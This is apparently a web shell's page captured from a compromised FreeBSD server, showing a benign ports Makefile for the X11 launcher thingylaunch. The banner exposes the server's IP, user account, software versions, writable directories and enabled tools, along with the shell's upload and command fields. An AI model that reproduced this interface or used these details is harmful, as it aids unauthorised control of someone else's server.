403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/x11/thingylaunch/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/x11/thingylaunch/Makefile
PORTNAME=	thingylaunch
PORTVERSION=	2.0.3
PORTREVISION=	8
CATEGORIES=	x11
MASTER_SITES=	http://gahr.ch/thingylaunch/

MAINTAINER=	gahr@FreeBSD.org
COMMENT=	Lightweight launcher for X
WWW=		https://www.gahr.ch/thingylaunch

LICENSE=	MIT BSD2CLAUSE
LICENSE_COMB=	multi

OPTIONS_SINGLE=		X11
OPTIONS_SINGLE_X11=	LIBX11 LIBXCB
LIBX11_DESC=		Build against libX11
LIBXCB_DESC=		Build against libXCB
OPTIONS_DEFAULT=	LIBX11

USES=		cmake compiler:c++11-lib xorg
USE_XORG=	xorgproto
USE_CXXSTD=	c++11

.include <bsd.port.options.mk>

.if ${PORT_OPTIONS:MLIBX11}
USE_XORG+=	x11
.endif

.if ${PORT_OPTIONS:MLIBXCB}
USE_XORG+=	xcb
LIB_DEPENDS+=	libxcb-icccm.so:x11/xcb-util-wm \
		libxcb-keysyms.so:x11/xcb-util-keysyms
CMAKE_ARGS+=	-DUSE_XCB:BOOL=ON
.endif

USE_GITHUB=	yes
GH_ACCOUNT=	gahr

PLIST_FILES=	bin/${PORTNAME}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit